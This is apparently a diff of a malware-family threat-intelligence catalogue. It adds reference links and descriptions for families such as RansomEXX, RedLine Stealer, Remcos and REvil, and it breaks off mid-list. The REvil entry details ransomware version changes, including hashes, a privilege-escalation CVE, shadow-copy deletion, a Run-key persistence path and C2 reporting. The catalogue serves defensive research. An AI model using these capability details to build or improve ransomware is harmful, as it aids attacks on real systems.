@@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramnit", + "https://securelist.com/financial-cyberthreats-in-2020/101638/", "http://contagiodump.blogspot.com/2012/01/blackhole-ramnit-samples-and-analysis.html", "https://blogs.akamai.com/2019/02/ramnit-in-the-uk.html", "http://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html", @@ -25570,10 +29179,13 @@ "https://redcanary.com/resources/webinars/deep-dive-process-injection/", "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf", "https://research.checkpoint.com/ramnits-network-proxy-servers/", + "http://www.secureworks.com/research/threat-profiles/gold-fairfax", "http://www.vkremez.com/2018/02/deeper-dive-into-ramnit-banker-vnc-ifsb.html", "https://www.youtube.com/watch?v=l6ZunH6YG0A", "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89", - "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/w32-ramnit-analysis-15-en.pdf" + "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/w32-ramnit-analysis-15-en.pdf", + "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", + "https://www.researchgate.net/profile/Lorenzo-De-Carli/publication/320250366_Botnet_protocol_inference_in_the_presence_of_encrypted_traffic/links/5fa9608792851cc286a08592/Botnet-protocol-inference-in-the-presence-of-encrypted-traffic.pdf?origin=publication_detail" ], "synonyms": [ "Nimnul" @@ -25648,22 +29260,31 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomexx", - "https://www.trendmicro.com/en_us/research/21/a/expanding-range-and-improving-speed-a-ransomexx-approach.html", "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4", "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3", "https://www.bleepingcomputer.com/news/security/new-ransom-x-ransomware-used-in-texas-txdot-cyberattack/", - "https://id-ransomware.blogspot.com/2020/06/ransomexx-ransomware.html", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", "https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware", + "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", + "https://www.trendmicro.com/en_us/research/21/a/expanding-range-and-improving-speed-a-ransomexx-approach.html", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/", - "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/", - "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html", + "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/", + "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/", "https://www.bleepingcomputer.com/news/security/brazils-court-system-under-massive-ransomexx-ransomware-attack/", "https://github.com/Bleeping/Ransom.exx", - "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", - "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/" + "https://www.bleepingcomputer.com/news/security/ransomware-attack-hits-italys-lazio-region-affects-covid-19-site/", + "https://id-ransomware.blogspot.com/2020/06/ransomexx-ransomware.html", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", + "https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/", + "https://www.youtube.com/watch?v=qxPXxWMI2i4", + "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/", + "https://www.bleepingcomputer.com/news/security/ecuadors-state-run-cnt-telco-hit-by-ransomexx-ransomware/", + "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout" ], "synonyms": [ "Defray777", @@ -25701,7 +29322,7 @@ "type": [] }, "uuid": "0e9c2936-7167-48fb-9dee-a83f83d8e41e", - "value": "Ransomware SNC" + "value": "SNC" }, { "description": "", @@ -25829,6 +29450,19 @@ "uuid": "80f87001-ff40-4e33-bd12-12ed1a92d1d7", "value": "RawPOS" }, + { + "description": "Razy is a malware family which uses a malicious browser extension in order to steal cryptocurrency.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.razy", + "https://securelist.com/razy-in-search-of-cryptocurrency/89485/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "6293085e-55c7-4026-8c98-1fa489692d4e", + "value": "Razy" + }, { "description": "A family identified by ESET Research in the InvisiMole campaign.", "meta": { @@ -25951,6 +29585,19 @@ "uuid": "6be9eee4-ee99-4ad6-bee3-2365d7b37a88", "value": "RedAlpha" }, + { + "description": "RedDelta variant of PlugX as used by Mustang Panda.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.reddelta", + "https://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loader" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a28c43e7-f303-4adb-b5f7-c3c7f9821bcd", + "value": "RedDelta" + }, { "description": "", "meta": { @@ -25982,17 +29629,26 @@ "value": "RedLeaves" }, { - "description": "Redline Stealer is a malware available on underground forums for sale apparently as standalone versions or also on a subscription basis. This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of Redliune added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.", + "description": "RedLine Stealer is a malware available on underground forums for sale apparently as standalone versions or also on a subscription basis. This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer", - "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a", - "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md", - "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", - "https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns", - "https://www.bleepingcomputer.com/news/security/redline-info-stealing-malware-spread-by-folding-home-phishing/", "https://www.proofpoint.com/us/threat-insight/post/new-redline-stealer-distributed-using-coronavirus-themed-email-campaign", - "https://www.proofpoint.com/us/threat-insight/post/ta505-and-others-launch-new-coronavirus-campaigns-now-largest-collection-attack" + "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://cyber-anubis.github.io/malware%20analysis/redline/", + "https://blogs.blackberry.com/en/2021/07/threat-thursday-redline-infostealer", + "https://blog.minerva-labs.com/become-a-vip-victim-with-new-discord-distributed-malware", + "https://securityintelligence.com/posts/roboski-global-recovery-automation/", + "https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns", + "https://blog.minerva-labs.com/redline-stealer-masquerades-as-telegram-installer", + "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", + "https://blog.morphisec.com/google-ppc-ads-deliver-redline-taurus-and-mini-redline-infostealers", + "https://bartblaze.blogspot.com/2021/06/digital-artists-targeted-in-redline.html", + "https://www.proofpoint.com/us/threat-insight/post/ta505-and-others-launch-new-coronavirus-campaigns-now-largest-collection-attack", + "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md", + "https://www.bleepingcomputer.com/news/security/redline-info-stealing-malware-spread-by-folding-home-phishing/", + "https://www.trendmicro.com/en_us/research/21/i/fake-installers-drop-malware-and-open-doors-for-opportunistic-attackers.html" ], "synonyms": [], "type": [] @@ -26000,6 +29656,19 @@ "uuid": "ff18a858-7778-485c-949b-d28d867d1ffb", "value": "RedLine Stealer" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.redosdru", + "https://securitynews.sonicwall.com/xmlpost/redosdru-v-malware-that-hides-in-encrypted-dll-files-to-avoid-detection-by-firewalls-may-112016/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "eb7a5417-ebbe-42c9-834b-2412a7e338f1", + "value": "Redosdru" + }, { "description": "", "meta": { @@ -26016,7 +29685,7 @@ "value": "REDPEPPER" }, { - "description": "", + "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.redrum", @@ -26030,7 +29699,7 @@ "type": [] }, "uuid": "cbb4cfd8-3642-4b04-a199-8e9b4b80fb62", - "value": "RedRum Ransomware" + "value": "RedRum" }, { "description": "", @@ -26107,7 +29776,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.regeorg", + "https://www.secureworks.com/research/samsam-ransomware-campaigns", + "https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF", "https://sensepost.com/discover/tools/reGeorg/", + "https://www.secureworks.com/blog/ransomware-deployed-by-adversary", "https://github.com/sensepost/reGeorg" ], "synonyms": [], @@ -26150,7 +29822,7 @@ "value": "RegretLocker" }, { - "description": "", + "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rekensom", @@ -26162,7 +29834,23 @@ "type": [] }, "uuid": "b59a97df-04c5-4e54-a7aa-92452baa7240", - "value": "RekenSom Ransomware" + "value": "RekenSom" + }, + { + "description": "A Trojan for Winows with the same code structure and functionalities of elf.rekoobe, for Linux environment instead. ", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rekoobew", + "https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/" + ], + "synonyms": [ + "tinyshell.win", + "tshd.win" + ], + "type": [] + }, + "uuid": "e928d9ca-237f-48ab-ab4c-65c04baeb863", + "value": "win.rekoobe" }, { "description": "", @@ -26197,7 +29885,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.remcom", - "https://doublepulsar.com/second-zerologon-attacker-seen-exploiting-internet-honeypot-c7fb074451ef" + "https://doublepulsar.com/second-zerologon-attacker-seen-exploiting-internet-honeypot-c7fb074451ef", + "http://www.secureworks.com/research/threat-profiles/gold-franklin" ], "synonyms": [ "RemoteCommandExecution" @@ -26212,35 +29901,48 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos", + "https://blog.morphisec.com/tracking-hcrypt-an-active-crypter-as-a-service", "https://dissectingmalwa.re/malicious-ratatouille.html", "https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads", "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter", "https://github.com/1d8/analyses/blob/master/RemcosDocDropper.MD", + "https://www.telsy.com/download/4832/", "https://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html", "https://www.fortinet.com/blog/threat-research/new-variant-of-remcos-rat-observed-in-the-wild.html", "https://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html", "https://secrary.com/ReversingMalware/RemcosRAT/", "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", "https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html", + "https://www.welivesecurity.com/2021/10/06/moon-hack-fake-safemoon-cryptocurrency-app-drops-malware-spy/", "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/", "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire", + "https://www.trendmicro.com/en_ca/research/19/h/analysis-new-remcos-rat-arrives-via-phishing-email.html", "https://blog.fortinet.com/2017/02/14/remcos-a-new-rat-in-the-wild-2", + "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html", "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", "https://myonlinesecurity.co.uk/fake-order-spoofed-from-finchers-ltd-sankyo-rubber-delivers-remcos-rat-via-ace-attachments/", "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update", + "https://www.cybereason.com/blog/cybereason-exposes-malware-targeting-us-taxpayers", + "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", "http://malware-traffic-analysis.net/2017/12/22/index.html", "https://blog.checkpoint.com/2019/06/19/sandblast-agent-phishing-germany-campaign-security-hack-ransomware/", "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", "https://krabsonsecurity.com/2018/03/02/analysing-remcos-rats-executable/", "https://news.sophos.com/en-us/2020/05/14/raticate/", + "https://www.anomali.com/blog/threat-actors-use-msbuild-to-deliver-rats-filelessly", + "https://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt", "https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/", - "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://www.bitdefender.com/files/News/CaseStudies/study/390/Bitdefender-PR-Whitepaper-Remcos-creat5080-en-EN-GenericUse.pdf", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/", + "https://securityintelligence.com/posts/roboski-global-recovery-automation/", "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", "https://www.vmray.com/cyber-security-blog/smart-memory-dumping/", - "https://www.youtube.com/watch?v=DIH4SvKuktM" + "https://www.youtube.com/watch?v=DIH4SvKuktM", + "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols" ], "synonyms": [ "RemcosRAT", @@ -26408,13 +30110,19 @@ "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/", "https://blog.talosintelligence.com/2019/08/rat-ratatouille-revrat-orcus.html", "https://isc.sans.edu/diary/rss/22590", + "https://blog.morphisec.com/ahk-rat-loader-leveraged-in-unique-delivery-campaigns", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://securelist.com/revengehotels/95229/", + "https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html", + "https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader", "https://www.binarydefense.com/revenge-is-a-dish-best-served-obfuscated", + "https://yoroi.company/research/the-evolution-of-aggah-from-roma225-to-the-rg-campaign/", "https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/", - "https://www.uptycs.com/blog/revenge-rat-targeting-users-in-south-america", + "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries", "https://blogs.360.cn/post/APT-C-44.html", "https://blog.reversinglabs.com/blog/rats-in-the-library", + "https://www.uptycs.com/blog/revenge-rat-targeting-users-in-south-america", + "https://blog.reversinglabs.com/blog/dotnet-loaders", "https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/", "https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g" ], @@ -26428,6 +30136,19 @@ }, { "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.reverse_rat", + "https://www.seqrite.com/documents/en/white-papers/Whitepaper-OperationSideCopy.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c3b6a9f9-afef-4249-ab59-afc5b2efc0b3", + "value": "ReverseRAT" + }, + { + "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.reveton", @@ -26437,106 +30158,232 @@ "type": [] }, "uuid": "48c10822-9af8-4324-9516-b33ecf975590", - "value": "Reveton Ransomware" + "value": "Reveton" }, { "description": "REvil Beta\r\nMD5: bed6fc04aeb785815744706239a1f243\r\nSHA1: 3d0649b5f76dbbff9f86b926afbd18ae028946bf\r\nSHA256: 3641b09bf6eae22579d4fd5aae420476a134f5948966944189a70afd8032cb45\r\n* Privilege escalation via CVE-2018-8453 (64-bit only)\r\n* Rerun with RunAs to elevate privileges\r\n* Implements a requirement that if \"exp\" is set, privilege escalation must be successful for full execution to occur\r\n* Implements target whitelisting using GetKetboardLayoutList\r\n* Contains debug console logging functionality\r\n* Defines the REvil registry root key as SOFTWARE\\!test\r\n* Includes two variable placeholders in the ransom note: UID & KEY\r\n* Terminates processes specified in the \"prc\" configuration key prior to encryption\r\n* Deletes shadow copies and disables recovery\r\n* Wipes contents of folders specified in the \"wfld\" configuration key prior to encryption\r\n* Encrypts all non-whitelisted files on fixed drives\r\n* Encrypts all non-whitelisted files on network mapped drives if it is running with System-level privileges or can impersonate the security context of explorer.exe\r\n* Partially implements a background image setting to display a basic \"Image text\" message\r\n* Sends encrypted system data to a C2 domain via an HTTPS POST request (URI path building is not implemented.)\r\n------------------------------------\r\nREvil 1.00\r\nMD5: 65aa793c000762174b2f86077bdafaea\r\nSHA1: 95a21e764ad0c98ea3d034d293aee5511e7c8457\r\nSHA256: f0c60f62ef9ffc044d0b4aeb8cc26b971236f24a2611cb1be09ff4845c3841bc\r\n* Adds 32-bit implementation of CVE-2018-8453 exploit\r\n* Removes console debug logging\r\n* Changes the REvil registry root key to SOFTWARE\\recfg\r\n* Removes the System/Impersonation success requirement for encrypting network mapped drives\r\n* Adds a \"wipe\" key to the configuration for optional folder wiping\r\n* Fully implements the background image setting and leverages values defined in the \"img\" configuration key\r\n* Adds an EXT variable placeholder to the ransom note to support UID, KEY, and EXT\r\n* Implements URI path building so encrypted system data is sent to a C2 pseudo-random URL\r\n* Fixes the function that returns the victim's username so the correct value is placed in the stats JSON data\r\n------------------------------------\r\nREvil 1.01\r\nMD5: 2abff29b4d87f30f011874b6e98959e9\r\nSHA1: 9d1b61b1cba411ee6d4664ba2561fa59cdb0732c\r\nSHA256: a88e2857a2f3922b44247316642f08ba8665185297e3cd958bbd22a83f380feb\r\n* Removes the exp/privilege escalation requirement for full execution and encrypts data regardless of privilege level\r\n* Makes encryption of network mapped drives optional by adding the \"-nolan\" argument\r\n------------------------------------\r\nREvil 1.02\r\nMD5: 4af953b20f3a1f165e7cf31d6156c035\r\nSHA1: b859de5ffcb90e4ca8e304d81a4f81e8785bb299\r\nSHA256: 89d80016ff4c6600e8dd8cfad1fa6912af4d21c5457b4e9866d1796939b48dc4\r\n* Enhances whitelisting validation by adding inspection of GetUserDefaultUILanguage and GetSystemDefaultUILanguage\r\n* Partially implements \"lock file\" logic by generating a lock filename based on the first four bytes of the Base64-decoded pk key, appending a .lock file extension, and adding the filename to the list of whitelisted files in the REvil configuration (It does not appear that this value is referenced after it is created and stored in memory. There is no evidence that a lock file is dropped to disk.)\r\n* Enhances folder whitelisting logic that take special considerations if the folder is associated with \"program files\" directories\r\n* Hard-codes whitelisting of all direct content within the Program Files or Program Files x86 directories\r\n* Hard-codes whitelisting of \"sql\" subfolders within program files\r\n* Encrypts program files sub-folders that does not contain \"sql\" in the path\r\n* Compares other folders to the list of whitelisted folders specified in the REvil configuration to determine if they are whitelisted\r\n* Encodes stored strings used for URI building within the binary and decodes them in memory right before use\r\n* Introduces a REvil registry root key \"sub_key\" registry value containing the attacker's public key\r\n------------------------------------\r\nREvil 1.03\r\nMD5: 3cae02306a95564b1fff4ea45a7dfc00\r\nSHA1: 0ce2cae5287a64138d273007b34933362901783d\r\nSHA256: 78fa32f179224c46ae81252c841e75ee4e80b57e6b026d0a05bb07d34ec37bbf\r\n* Removes lock file logic that was partially implemented in 1.02\r\n* Leverages WMI to continuously monitor for and kill newly launched processes whose names are listed in the prc configuration key (Previous versions performed this action once.)\r\n* Encodes stored shellcode\r\n* Adds the -path argument:\r\n* Does not wipe folders (even if wipe == true)\r\n* Does not set desktop background\r\n* Does not contact the C2 server (even if net == true)\r\n* Encrypts files in the specified folder and drops the ransom note\r\n* Changes the REvil registry root key to SOFTWARE\\QtProject\\OrganizationDefaults\r\n* Changes registry key values from --> to:\r\n * sub_key --> pvg\r\n * pk_key --> sxsP\r\n * sk_key --> BDDC8\r\n * 0_key --> f7gVD7\r\n * rnd_ext --> Xu7Nnkd\r\n * stat --> sMMnxpgk\r\n------------------------------------\r\nREvil 1.04\r\nMD5: 6e3efb83299d800edf1624ecbc0665e7\r\nSHA1: 0bd22f204c5373f1a22d9a02c59f69f354a2cc0d\r\nSHA256: 2ca64feaaf5ab6cf96677fbc2bc0e1995b3bc93472d7af884139aa757240e3f6\r\n* Leverages PowerShell and WMI to delete shadow copies if the victim's operating system is newer than Windows XP (For Windows XP or older, it uses the original command that was executed in all previous REvil versions.)\r\n* Removes the folder wipe capability\r\n* Changes the REvil registry root key to SOFTWARE\\GitForWindows\r\n* Changes registry key values from --> to:\r\n * pvg --> QPM\r\n * sxsP --> cMtS\r\n * BDDC8 --> WGg7j\r\n * f7gVD7 --> zbhs8h\r\n * Xu7Nnkd --> H85TP10\r\n * sMMnxpgk --> GCZg2PXD\r\n------------------------------------\r\nREvil v1.05\r\nMD5: cfefcc2edc5c54c74b76e7d1d29e69b2\r\nSHA1: 7423c57db390def08154b77e2b5e043d92d320c7\r\nSHA256: e430479d1ca03a1bc5414e28f6cdbb301939c4c95547492cdbe27b0a123344ea\r\n* Add new 'arn' configuration key that contains a boolean true/false value that controls whether or not to implement persistence.\r\n* Implements persistence functionality via registry Run key. Data for value is set to the full path and filename of the currently running executable. The executable is never moved into any 'working directory' such as %AppData% or %TEMP% as part of the persistence setup. The Reg Value used is the hardcoded value of 'lNOWZyAWVv' :\r\n * SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\lNOWZyAWVv\r\n* Before exiting, REvil sets up its malicious executable to be deleted upon reboot by issuing a call to MoveFileExW and setting the destination to NULL and the flags to 4 (MOVEFILE_DELAY_UNTIL_REBOOT). This breaks persistence however as the target executable specified in the Run key will no longer exist once this is done.\r\n* Changes registry key values from --> to:\r\n * QPM --> tgE\r\n * cMtS --> 8K09\r\n * WGg7j --> xMtNc\r\n * zbhs8h --> CTgE4a\r\n * H85TP10 --> oE5bZg0\r\n * GCZg2PXD --> DC408Qp4\r\n------------------------------------\r\nREvil v1.06\r\nMD5: 65ff37973426c09b9ff95f354e62959e\r\nSHA1: b53bc09cfbd292af7b3609734a99d101bd24d77e\r\nSHA256: 0e37d9d0a7441a98119eb1361a0605042c4db0e8369b54ba26e6ba08d9b62f1e\r\n* Updated string decoding function to break existing yara rules. Likely the result of the blog posted by us.\r\n* Modified handling of network file encryption. Now explicitly passes every possible \"Scope\" constant to the WNetOpenEnum function when looking for files to encrypt. It also changed the 'Resource Type\" from RESOURCETYPE_DISK to RESOURCETYPE_ANY which will now include things like mapped printers.\r\n* Persistence registry value changed from 'lNOWZyAWVv' to 'sNpEShi30R'\r\n* Changes registry key values from --> to:\r\n * tgE --> 73g\r\n * 8K09 --> vTGj\r\n * xMtNc --> Q7PZe\r\n * CTgE4a --> BuCrIp\r\n * oE5bZg0 --> lcZd7OY\r\n * DC408Qp4 --> sLF86MWC\r\n------------------------------------\r\nREvil v1.07\r\nMD5: ea4cae3d6d8150215a4d90593a4c30f2\r\nSHA1: 8dcbcbefaedf5675b170af3fd44db93ad864894e\r\nSHA256: 6a2bd52a5d68a7250d1de481dcce91a32f54824c1c540f0a040d05f757220cd3\r\nTBD", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.revil", + "https://therecord.media/i-scrounged-through-the-trash-heaps-now-im-a-millionaire-an-interview-with-revils-unknown/", + "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/", + "https://twitter.com/VK_Intel/status/1374571480370061312?s=20", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", + "https://blog.talosintelligence.com/2021/03/ctir-trends-winter-2020-21.html", + "https://blog.group-ib.com/REvil_RaaS", "https://www.tgsoft.it/english/news_archivio_eng.asp?id=1004", + "https://www.pandasecurity.com/emailhtml/2007-CAM-RANSOMWARE-AD360-WG/2006-Report-Sodinokibi-EN.pdf", "https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html", "https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/", + "https://www.bleepingcomputer.com/news/security/revil-ransomware-devs-added-a-backdoor-to-cheat-affiliates/", "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-threatens-to-publish-data-of-automotive-group/", + "https://twitter.com/fwosar/status/1411281334870368260", "https://www.zdnet.com/article/revil-ransomware-gang-launches-auction-site-to-sell-stolen-data/", + "https://news.sophos.com/en-us/2021/06/11/relentless-revil-revealed/", + "https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/", "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf", + "https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-gang-rises-from-the-ashes-of-darkside-revil/", + "https://www.netskope.com/blog/netskope-threat-coverage-revil", "https://krebsonsecurity.com/2019/07/is-revil-the-new-gandcrab-ransomware/", + "https://twitter.com/VK_Intel/status/1411066870350942213", "https://public.intel471.com/blog/revil-ransomware-interview-russian-osint-100-million/", "https://medium.com/@underthebreach/tracking-down-revils-lalartu-by-utilizing-multiple-osint-methods-2bf3a6c65a80", - "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2", + "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89", + "https://www.advanced-intel.com/post/revil-vanishes-from-underground-infrastructure-down-support-staff-adverts-silent", + "https://cybersecurity.att.com/blogs/labs-research/revils-new-linux-version", "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf", + "https://www.washingtonpost.com/national-security/ransomware-fbi-revil-decryption-key/2021/09/21/4a9417d0-f15f-11eb-a452-4da5fe48582d_story.html", + "https://www.flashpoint-intel.com/blog/revils-cryptobackdoor-con-ransomware-groups-tactics-roil-affiliates-sparking-a-fallout/", "https://f.hubspotusercontent10.net/hubfs/5943619/Whitepaper-Downloads/Ransomware_in_ICS_Environments_Whitepaper_10_12_20.pdf", + "http://www.secureworks.com/research/threat-profiles/gold-southfield", "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://twitter.com/svch0st/status/1411537562380816384", + "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/", "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-says-travelex-will-pay-one-way-or-another/", + "https://www.youtube.com/watch?v=P8o6GItci5w", "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", + "https://www.digitalshadows.com/blog-and-research/competitions-on-russian-language-cybercriminal-forums-sharing-expertise-or-threat-actor-showboating/", "https://www.bleepingcomputer.com/news/security/another-ransomware-will-now-publish-victims-data-if-not-paid/", - "https://www.bleepingcomputer.com/news/security/new-jersey-synagogue-suffers-sodinokibi-ransomware-attack/", + "https://blog.truesec.com/2021/07/06/kaseya-vsa-zero-day-exploit", + "https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/", "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", "https://asec.ahnlab.com/ko/19860/", + 